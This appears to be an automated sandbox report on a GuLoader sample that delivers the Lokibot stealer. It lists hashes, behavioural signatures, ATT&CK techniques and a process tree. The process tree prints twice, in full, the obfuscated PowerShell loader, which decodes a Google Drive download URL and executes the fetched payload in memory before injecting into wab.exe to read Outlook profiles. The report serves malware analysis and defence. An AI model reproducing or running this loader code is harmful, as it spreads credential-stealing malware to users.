guloader | 6a872532ca240daaf8bd0b676678bfdfcad6f0c72c58f675574d3a1f471bea9f

Analysis

max time kernel
143s
max time network
147s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
18-04-2024 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58.vbs
Size

361KB
MD5

fe62c58bcc975e7ebbd268b44a518785
SHA1

696f215f0abe6f1513ddd0a6e8235d99fa5da7fe
SHA256

67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58
SHA512

5d70692b8c4b95c61d08c07b1eff6d98ebf58692a10af71281a1fba06a94cb25102803bf1776a5546798427b7a4a76bf62bd3538ed7e7a063f27326df484cc80
SSDEEP

6144:6Q1LaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkP/:bKInOiANKdGs

Score

10^/10

guloader lokibot collection downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 2152 WScript.exe
7 1876 powershell.exe
9 1876 powershell.exe

flow	pid	process
3	2152	WScript.exe
7	1876	powershell.exe
9	1876	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
7 drive.google.com
11 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2888 wab.exe
2888 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1032 powershell.exe
2888 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1032 set thread context of 2888 1032 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

1876 powershell.exe
1032 powershell.exe
1032 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exe

pid process

1032 powershell.exe
1032 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 1876 powershell.exe
Token: SeDebugPrivilege 1032 powershell.exe
Token: SeDebugPrivilege 2888 wab.exe

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

pid	process
2888	wab.exe
2888	wab.exe

pid	process
1032	powershell.exe
2888	wab.exe

description	pid	process	target process
PID 1032 set thread context of 2888	1032	powershell.exe	wab.exe

pid	process
1876	powershell.exe
1032	powershell.exe
1032	powershell.exe

pid	process
1032	powershell.exe
1032	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	2888	wab.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2152 wrote to memory of 1876	2152	WScript.exe	powershell.exe
PID 2152 wrote to memory of 1876	2152	WScript.exe	powershell.exe
PID 2152 wrote to memory of 1876	2152	WScript.exe	powershell.exe
PID 1876 wrote to memory of 996	1876	powershell.exe	cmd.exe
PID 1876 wrote to memory of 996	1876	powershell.exe	cmd.exe
PID 1876 wrote to memory of 996	1876	powershell.exe	cmd.exe
PID 1876 wrote to memory of 1032	1876	powershell.exe	powershell.exe
PID 1876 wrote to memory of 1032	1876	powershell.exe	powershell.exe
PID 1876 wrote to memory of 1032	1876	powershell.exe	powershell.exe
PID 1876 wrote to memory of 1032	1876	powershell.exe	powershell.exe
PID 1032 wrote to memory of 1720	1032	powershell.exe	cmd.exe
PID 1032 wrote to memory of 1720	1032	powershell.exe	cmd.exe
PID 1032 wrote to memory of 1720	1032	powershell.exe	cmd.exe
PID 1032 wrote to memory of 1720	1032	powershell.exe	cmd.exe
PID 1032 wrote to memory of 2092	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2092	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2092	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2092	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2888	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2888	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2888	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2888	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2888	1032	powershell.exe	wab.exe
PID 1032 wrote to memory of 2888	1032	powershell.exe	wab.exe

outlook_office_path 1 IoCs

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

outlook_win_path 1 IoCs

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
3⤵
PID:996

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
4⤵
PID:1720

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:2092

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2888

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
456c1918f43d2259a12f0926dbff3614

SHA1
f285b9141ed02cfdfe25c0a9f6f5bfb9d750dedb

SHA256
393dcba5bf0687c86c54bd63144f43d4dcf42ee1bf0bf812eaf662101afbecdc

SHA512
